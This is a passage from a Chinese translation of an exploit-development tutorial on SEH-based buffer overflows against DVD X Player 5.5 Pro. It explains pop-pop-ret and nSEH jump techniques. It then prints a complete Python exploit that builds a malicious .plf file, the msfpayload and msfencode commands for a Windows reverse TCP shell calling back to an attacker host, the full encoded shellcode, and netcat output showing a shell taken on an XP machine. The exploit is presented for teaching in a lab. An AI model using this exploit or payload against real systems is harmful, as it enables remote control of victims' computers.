你可能会想这和漏洞利用有什么关系. 如果我们能够控制一大块缓冲区并且覆写其中一个异常处理函数, 异常发生时候Windows会把寄存器清0, 因此不能直接跳到Shellcode. 幸运的是这个保护机制有缺陷, 我们只需要用pop pop retn 指令地址覆盖掉SEH. 记住esp+8处保存着nSEH的地址, pop pop retn执行后程序最终会跳到nSEH处执行. 我们可以控制nSEH这四个字节的空间, 通过在这四个字节空间写入指令跳转到Shellcode.
这些地址大部分都可以用, 记住不包含坏字符即可. 通常我会选择pop pop retn而不是pop pop retn n. 在immunity debugger 的安装目录下找到SEH.txt, 里面有2968个合法的指针. 有序小序的CPU架构, 需要扭转字节顺序.
Pointer: 0x61617619 : pop esi # pop edi # ret | asciiprint,ascii {PAGE_EXECUTE_READ} [EPG.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.12.21.2006 (C:\Program Files\Aviosoft\DVD X Player 5.5 Professional\EPG.dll)
#!/usr/bin/python -w
filename="evil.plf"
Shellcode = (
)
#----------------------------------------------------------------------------------#
# (*) badchars = '\x00\x0A\x0D\x1A' #
# #
# offset to: (2) nseh 608-bytes, (1) seh 112-bytes #
# (2) nseh = '\xEB\x06' => jump short 6-bytes #
# (1) seh = 0x61617619 : pop esi # pop edi # ret | EPG.dll #
# (3) Shellcode space = 1384-bytes #
#----------------------------------------------------------------------------------#
# SEH Exploit Structure: #
# \----------------> #
# [AAA..................AAA] [nseh] [seh] [BBB..................BBB] #
# \--------------------------------------> #
# <-------/ #
# (1) Initial overwrite, SEH leads us back 4-bytes to nSEH #
# (2) nSEH jumps over SEH and redirects execution to our B's #
# (3) We place our Shellcode here ... Game Over! #
#----------------------------------------------------------------------------------#
evil = "\x90"*20 + Shellcode
buffer = "A"*608 + "\xEB\x06\x90\x90" + "\x19\x76\x61\x61" + evil + "B"*(1384-len(evil))
textfile = open(filename , 'w')
textfile.write(buffer)
textfile.close()
是时候去生成一些Shellcode了, 为了不重复这次我决定使用反连Shell…
root@bt:~# msfpayload -l
[...snip...]
windows/Shell_bind_tcp_xpfw Disable the Windows ICF, then listen for a connection and spawn a
command Shell
windows/Shell_reverse_tcp Connect back to attacker and spawn a command Shell
windows/speak_pwned Causes the target to say "You Got Pwned" via the Windows Speech API
[...snip...]
root@bt:~# msfpayload windows/Shell_reverse_tcp O
Name: Windows Command Shell, Reverse TCP Inline
Module: payload/windows/Shell_reverse_tcp
Version: 8642
Platform: Windows
Arch: x86
Needs Admin: No
Total size: 314
Rank: Normal
Provided by:
vlad902 <vlad902@gmail.com>
sf <stephen_fewer@harmonysecurity.com>
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique: seh, thread, process, none
LHOST yes The listen address
LPORT 4444 yes The listen port
Description:
Connect back to attacker and spawn a command Shell
root@bt:~# msfpayload windows/Shell_reverse_tcp LHOST=192.168.111.132 LPORT=9988 R| msfencode -b
'\x00\x0A\x0D\x1A' -t c
[*] x86/shikata_ga_nai succeeded with size 341 (iteration=1)
unsigned char buf[] =
"\xba\x6f\x3d\x04\x90\xd9\xc7\xd9\x74\x24\xf4\x5e\x2b\xc9\xb1"
"\x4f\x31\x56\x14\x83\xee\xfc\x03\x56\x10\x8d\xc8\xf8\x78\xd8"
"\x33\x01\x79\xba\xba\xe4\x48\xe8\xd9\x6d\xf8\x3c\xa9\x20\xf1"
"\xb7\xff\xd0\x82\xb5\xd7\xd7\x23\x73\x0e\xd9\xb4\xb2\x8e\xb5"
"\x77\xd5\x72\xc4\xab\x35\x4a\x07\xbe\x34\x8b\x7a\x31\x64\x44"
"\xf0\xe0\x98\xe1\x44\x39\x99\x25\xc3\x01\xe1\x40\x14\xf5\x5b"
"\x4a\x45\xa6\xd0\x04\x7d\xcc\xbe\xb4\x7c\x01\xdd\x89\x37\x2e"
"\x15\x79\xc6\xe6\x64\x82\xf8\xc6\x2a\xbd\x34\xcb\x33\xf9\xf3"
"\x34\x46\xf1\x07\xc8\x50\xc2\x7a\x16\xd5\xd7\xdd\xdd\x4d\x3c"
"\xdf\x32\x0b\xb7\xd3\xff\x58\x9f\xf7\xfe\x8d\xab\x0c\x8a\x30"
"\x7c\x85\xc8\x16\x58\xcd\x8b\x37\xf9\xab\x7a\x48\x19\x13\x22"
"\xec\x51\xb6\x37\x96\x3b\xdf\xf4\xa4\xc3\x1f\x93\xbf\xb0\x2d"
"\x3c\x6b\x5f\x1e\xb5\xb5\x98\x61\xec\x01\x36\x9c\x0f\x71\x1e"
"\x5b\x5b\x21\x08\x4a\xe4\xaa\xc8\x73\x31\x7c\x99\xdb\xea\x3c"
"\x49\x9c\x5a\xd4\x83\x13\x84\xc4\xab\xf9\xb3\xc3\x3c\xc2\x6c"
"\xa4\x38\xaa\x6e\x3a\x66\x2f\xe6\xdc\x02\x3f\xae\x77\xbb\xa6"
"\xeb\x03\x5a\x26\x26\x83\xff\xb5\xad\x53\x89\xa5\x79\x04\xde"
"\x18\x70\xc0\xf2\x03\x2a\xf6\x0e\xd5\x15\xb2\xd4\x26\x9b\x3b"
"\x98\x13\xbf\x2b\x64\x9b\xfb\x1f\x38\xca\x55\xc9\xfe\xa4\x17"
"\xa3\xa8\x1b\xfe\x23\x2c\x50\xc1\x35\x31\xbd\xb7\xd9\x80\x68"
"\x8e\xe6\x2d\xfd\x06\x9f\x53\x9d\xe9\x4a\xd0\xad\xa3\xd6\x71"
"\x26\x6a\x83\xc3\x2b\x8d\x7e\x07\x52\x0e\x8a\xf8\xa1\x0e\xff"
"\xfd\xee\x88\xec\x8f\x7f\x7d\x12\x23\x7f\x54";
加上一些注释, 最后的EXP如下:
#!/usr/bin/python -w
#----------------------------------------------------------------------------------#
# Exploit: DVD X Player 5.5 Pro SEH (local BOF) #
# OS: Tested XP PRO SP3 (EPG.dll should be universal) #
# Author: b33f (Ruben Boonen) #
# Software: http://www.exploit-db.com/wp-content/themes/exploit/applications #
# /cdfda7217304f4deb7d2e8feb5696394-DVDXPlayerSetup.exe #
#----------------------------------------------------------------------------------#
# This exploit was created for Part 3 of my Exploit Development tutorial series... #
# http://www.fuzzysecurity.com/tutorials/expDev/3.html #
#----------------------------------------------------------------------------------#
# root@bt:~# nc -lvp 9988 #
# listening on [any] 9988 ... #
# 192.168.111.128: inverse host lookup failed: Unknown server error #
# connect to [192.168.111.132] from (UNKNOWN) [192.168.111.128] 1044 #
# Microsoft Windows XP [Version 5.1.2600] #
# (C) Copyright 1985-2001 Microsoft Corp. #
# #
# G:\tutorial>ipconfig #
# ipconfig #
# #
# Windows IP Configuration #
# #
# #
# Ethernet adapter Local Area Connection: #
# #
# Connection-specific DNS Suffix . : localdomain #
# IP Address. . . . . . . . . . . . : 192.168.111.128 #
# Subnet Mask . . . . . . . . . . . : 255.255.255.0 #
# Default Gateway . . . . . . . . . : #
# #
# G:\tutorial> #
#----------------------------------------------------------------------------------#
filename="evil.plf"
#---------------------------------------------------------------------------------------------------------------#
# msfpayload windows/Shell_reverse_tcp LHOST=192.168.111.132 LPORT=9988 R| msfencode -b '\x00\x0A\x0D\x1A' -t c #
# [*] x86/shikata_ga_nai succeeded with size 341 (iteration=1) #
#---------------------------------------------------------------------------------------------------------------#
Shellcode = (
"\xba\x6f\x3d\x04\x90\xd9\xc7\xd9\x74\x24\xf4\x5e\x2b\xc9\xb1"
"\x4f\x31\x56\x14\x83\xee\xfc\x03\x56\x10\x8d\xc8\xf8\x78\xd8"
"\x33\x01\x79\xba\xba\xe4\x48\xe8\xd9\x6d\xf8\x3c\xa9\x20\xf1"
"\xb7\xff\xd0\x82\xb5\xd7\xd7\x23\x73\x0e\xd9\xb4\xb2\x8e\xb5"
"\x77\xd5\x72\xc4\xab\x35\x4a\x07\xbe\x34\x8b\x7a\x31\x64\x44"
"\xf0\xe0\x98\xe1\x44\x39\x99\x25\xc3\x01\xe1\x40\x14\xf5\x5b"
"\x4a\x45\xa6\xd0\x04\x7d\xcc\xbe\xb4\x7c\x01\xdd\x89\x37\x2e"
"\x15\x79\xc6\xe6\x64\x82\xf8\xc6\x2a\xbd\x34\xcb\x33\xf9\xf3"
"\x34\x46\xf1\x07\xc8\x50\xc2\x7a\x16\xd5\xd7\xdd\xdd\x4d\x3c"
"\xdf\x32\x0b\xb7\xd3\xff\x58\x9f\xf7\xfe\x8d\xab\x0c\x8a\x30"
"\x7c\x85\xc8\x16\x58\xcd\x8b\x37\xf9\xab\x7a\x48\x19\x13\x22"
"\xec\x51\xb6\x37\x96\x3b\xdf\xf4\xa4\xc3\x1f\x93\xbf\xb0\x2d"
"\x3c\x6b\x5f\x1e\xb5\xb5\x98\x61\xec\x01\x36\x9c\x0f\x71\x1e"
"\x5b\x5b\x21\x08\x4a\xe4\xaa\xc8\x73\x31\x7c\x99\xdb\xea\x3c"
"\x49\x9c\x5a\xd4\x83\x13\x84\xc4\xab\xf9\xb3\xc3\x3c\xc2\x6c"
"\xa4\x38\xaa\x6e\x3a\x66\x2f\xe6\xdc\x02\x3f\xae\x77\xbb\xa6"
"\xeb\x03\x5a\x26\x26\x83\xff\xb5\xad\x53\x89\xa5\x79\x04\xde"
"\x18\x70\xc0\xf2\x03\x2a\xf6\x0e\xd5\x15\xb2\xd4\x26\x9b\x3b"
"\x98\x13\xbf\x2b\x64\x9b\xfb\x1f\x38\xca\x55\xc9\xfe\xa4\x17"
"\xa3\xa8\x1b\xfe\x23\x2c\x50\xc1\x35\x31\xbd\xb7\xd9\x80\x68"
"\x8e\xe6\x2d\xfd\x06\x9f\x53\x9d\xe9\x4a\xd0\xad\xa3\xd6\x71"
"\x26\x6a\x83\xc3\x2b\x8d\x7e\x07\x52\x0e\x8a\xf8\xa1\x0e\xff"
"\xfd\xee\x88\xec\x8f\x7f\x7d\x12\x23\x7f\x54")
#----------------------------------------------------------------------------------#
# (*) badchars = '\x00\x0A\x0D\x1A' #
# #
# offset to: (2) nseh 608-bytes, (1) seh 112-bytes #
# (2) nseh = '\xEB\x06' => jump short 6-bytes #
# (1) seh = 0x61617619 : pop esi # pop edi # ret | EPG.dll #
# (3) Shellcode space = 1384-bytes #
#----------------------------------------------------------------------------------#
# SEH Exploit Structure: #
# \----------------> #
# [AAA..................AAA] [nseh] [seh] [BBB..................BBB] #
# \--------------------------------------> #
# <-------/ #
# (1) Initial EIP overwrite, SEH leads us back 4-bytes to nSEH #
# (2) nSEH jumps over SEH and redirects execution to our B's #
# (3) We place our Shellcode here ... Game Over! #
#----------------------------------------------------------------------------------#
evil = "\x90"*20 + Shellcode
buffer = "A"*608 + "\xEB\x06\x90\x90" + "\x19\x76\x61\x61" + evil + "B"*(1384-len(evil))
textfile = open(filename , 'w')
textfile.write(buffer)
textfile.close()
在下面的截图中我们可以看到, EXP执行后我们得到一个反连Shell。游戏结束! !
root@bt:~/Desktop# nc -lvp 9988
listening on [any] 9988 ...
192.168.111.128: inverse host lookup failed: Unknown server error : Connection timed out
connect to [192.168.111.132] from (UNKNOWN) [192.168.111.128] 1044
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.